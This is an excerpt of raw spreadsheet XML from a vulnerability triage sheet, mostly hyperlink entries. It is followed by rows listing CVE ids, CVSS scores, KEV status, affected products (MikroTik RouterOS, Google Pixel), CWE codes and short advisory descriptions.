    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S884" r:id="rId883"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S885" r:id="rId884"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S886" r:id="rId885"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S887" r:id="rId886"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S888" r:id="rId887"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S889" r:id="rId888"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S890" r:id="rId889"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S891" r:id="rId890"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S892" r:id="rId891"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S893" r:id="rId892"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S894" r:id="rId893"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S895" r:id="rId894"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S896" r:id="rId895"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S897" r:id="rId896"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S898" r:id="rId897"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S899" r:id="rId898"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S900" r:id="rId899"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S901" r:id="rId900"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S902" r:id="rId901"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S903" r:id="rId902"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S904" r:id="rId903"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S905" r:id="rId904"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S906" r:id="rId905"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S907" r:id="rId906"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S908" r:id="rId907"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S909" r:id="rId908"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S910" r:id="rId909"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S911" r:id="rId910"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S912" r:id="rId911"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S913" r:id="rId912"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S914" r:id="rId913"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S915" r:id="rId914"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S916" r:id="rId915"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S917" r:id="rId916"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S918" r:id="rId917"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S919" r:id="rId918"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S920" r:id="rId919"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S921" r:id="rId920"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S922" r:id="rId921"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S923" r:id="rId922"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S924" r:id="rId923"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S925" r:id="rId924"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S926" r:id="rId925"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S927" r:id="rId926"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S928" r:id="rId927"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S929" r:id="rId928"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S930" r:id="rId929"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S931" r:id="rId930"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S932" r:id="rId931"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S933" r:id="rId932"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S934" r:id="rId933"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S935" r:id="rId934"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S936" r:id="rId935"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S937" r:id="rId936"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S938" r:id="rId937"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S939" r:id="rId938"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S940" r:id="rId939"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S941" r:id="rId940"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S942" r:id="rId941"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S943" r:id="rId942"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S944" r:id="rId943"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S945" r:id="rId944"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S946" r:id="rId945"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S947" r:id="rId946"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S948" r:id="rId947"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S949" r:id="rId948"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S950" r:id="rId949"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S951" r:id="rId950"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S952" r:id="rId951"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S953" r:id="rId952"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S954" r:id="rId953"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S955" r:id="rId954"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S956" r:id="rId955"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S957" r:id="rId956"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S958" r:id="rId957"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S959" r:id="rId958"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S960" r:id="rId959"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S961" r:id="rId960"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S962" r:id="rId961"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S963" r:id="rId962"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S964" r:id="rId963"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S965" r:id="rId964"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S966" r:id="rId965"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S967" r:id="rId966"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S968" r:id="rId967"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S969" r:id="rId968"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S970" r:id="rId969"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S971" r:id="rId970"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S972" r:id="rId971"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S973" r:id="rId972"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S974" r:id="rId973"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S975" r:id="rId974"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S976" r:id="rId975"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S977" r:id="rId976"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S978" r:id="rId977"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S979" r:id="rId978"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S980" r:id="rId979"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S981" r:id="rId980"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S982" r:id="rId981"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S983" r:id="rId982"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S984" r:id="rId983"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S985" r:id="rId984"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S986" r:id="rId985"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S987" r:id="rId986"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S988" r:id="rId987"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S989" r:id="rId988"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S990" r:id="rId989"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S991" r:id="rId990"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S992" r:id="rId991"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S993" r:id="rId992"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S994" r:id="rId993"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S995" r:id="rId994"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S996" r:id="rId995"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S997" r:id="rId996"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S998" r:id="rId997"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S999" r:id="rId998"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1000" r:id="rId999"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1001" r:id="rId1000"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1002" r:id="rId1001"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1003" r:id="rId1002"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1004" r:id="rId1003"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1005" r:id="rId1004"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1006" r:id="rId1005"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1007" r:id="rId1006"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1008" r:id="rId1007"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1009" r:id="rId1008"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1010" r:id="rId1009"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1011" r:id="rId1010"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1012" r:id="rId1011"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1013" r:id="rId1012"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1014" r:id="rId1013"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1015" r:id="rId1014"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1016" r:id="rId1015"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1017" r:id="rId1016"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1018" r:id="rId1017"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1019" r:id="rId1018"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1020" r:id="rId1019"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1021" r:id="rId1020"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1022" r:id="rId1021"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1023" r:id="rId1022"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1024" r:id="rId1023"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1025" r:id="rId1024"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1026" r:id="rId1025"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1027" r:id="rId1026"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1028" r:id="rId1027"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1029" r:id="rId1028"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1030" r:id="rId1029"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1031" r:id="rId1030"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1032" r:id="rId1031"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1033" r:id="rId1032"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1034" r:id="rId1033"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1035" r:id="rId1034"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1036" r:id="rId1035"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1037" r:id="rId1036"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1038" r:id="rId1037"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1039" r:id="rId1038"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1040" r:id="rId1039"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1041" r:id="rId1040"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1042" r:id="rId1041"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1043" r:id="rId1042"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1044" r:id="rId1043"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1045" r:id="rId1044"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1046" r:id="rId1045"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1047" r:id="rId1046"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1048" r:id="rId1047"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1049" r:id="rId1048"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1050" r:id="rId1049"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1051" r:id="rId1050"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1052" r:id="rId1051"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1053" r:id="rId1052"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1054" r:id="rId1053"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1055" r:id="rId1054"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1056" r:id="rId1055"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1057" r:id="rId1056"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1058" r:id="rId1057"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1059" r:id="rId1058"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1060" r:id="rId1059"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1061" r:id="rId1060"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1062" r:id="rId1061"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1063" r:id="rId1062"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1064" r:id="rId1063"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1065" r:id="rId1064"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1066" r:id="rId1065"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1067" r:id="rId1066"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1068" r:id="rId1067"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1069" r:id="rId1068"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1070" r:id="rId1069"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1071" r:id="rId1070"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1072" r:id="rId1071"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1073" r:id="rId1072"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1074" r:id="rId1073"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1075" r:id="rId1074"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1076" r:id="rId1075"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1077" r:id="rId1076"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1078" r:id="rId1077"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1079" r:id="rId1078"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1080" r:id="rId1079"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1081" r:id="rId1080"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1082" r:id="rId1081"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1083" r:id="rId1082"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1084" r:id="rId1083"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1085" r:id="rId1084"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1086" r:id="rId1085"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1087" r:id="rId1086"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1088" r:id="rId1087"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1089" r:id="rId1088"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1090" r:id="rId1089"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1091" r:id="rId1090"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1092" r:id="rId1091"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1093" r:id="rId1092"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1094" r:id="rId1093"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1095" r:id="rId1094"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1096" r:id="rId1095"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1097" r:id="rId1096"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1098" r:id="rId1097"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1099" r:id="rId1098"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1100" r:id="rId1099"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1101" r:id="rId1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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>RouterOS contains an argument-handling flaw in the SSH login
path involving usernames that begin with a prohibited character, allowing for the trusted RouterOS policy mask to be changed, leading to privilege escalation. Exploitation requires an unauthenticated SSH session to reach the RouterOS login helper.This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
